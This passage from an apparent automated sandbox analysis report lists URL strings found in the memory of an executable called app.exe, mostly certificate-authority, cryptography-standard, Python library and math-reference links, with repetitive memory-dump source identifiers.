00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
    Source: app.exe, 00000002.00000002.3284450216.000002083AB10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cffi.readthedocs.io/en/latest/cdef.html#ffi-cdef-limitations
    Source: app.exe, 00000000.00000003.2074056196.000002225456B000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: http://cffi.readthedocs.org
    Source: app.exe, 00000000.00000003.2074056196.000002225456B000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: http://cffi.readthedocs.org/
    Source: app.exe, 00000002.00000002.3278071149.0000020832EC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
    Source: app.exe, 00000002.00000003.2088609981.0000020832FD8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
    Source: app.exe, 00000000.00000003.2038853805.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040994788.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
    Source: app.exe, 00000002.00000002.3283351198.000002083A0C2000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
    Source: app.exe, 00000002.00000002.3283351198.000002083A0C2000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
    Source: app.exe, 00000002.00000002.3279130529.0000020833952000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
    Source: app.exe, 00000002.00000002.3283351198.000002083A0C2000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3284509974.000002083ABA0000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3284480705.000002083AB60000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278542188.00000208332B0000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3284539258.000002083ABE0000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3283351198.000002083A09C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3284450216.000002083AB10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
    Source: app.exe, 00000002.00000002.3284244401.000002083A8B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://digitalassets.lib.berkeley.edu/sdtr/ucb/text/34.pdf
    Source: app.exe, 00000002.00000002.3278442607.0000020833230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/itertools.html#recipes
    Source: app.exe, 00000002.00000002.3278442607.0000020833230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tar.gz
    Source: app.exe, 00000002.00000002.3278442607.0000020833230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tgz
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
    Source: app.exe, 00000002.00000002.3279130529.0000020833952000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
    Source: app.exe, 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://html4/loose.dtd
    Source: app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/BinomialDistribution.html
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/CauchyDistribution.html
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/GammaDistribution.html
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/HypergeometricDistribution.html
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/LaplaceDistribution.html
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/LogisticDistribution.html
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/NegativeBinomialDistribution.html
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/NoncentralF-Distribution.html
    Source: app.exe, 00000000.00000003.2068528399.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/PoissonDistribution.html
    Source: app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mathworld.wolfram.com/SincFunction.html
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040994788.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
    Source: app.exe, 00000002.00000002.3278244921.00000208330C0000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278275253.0000020833100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
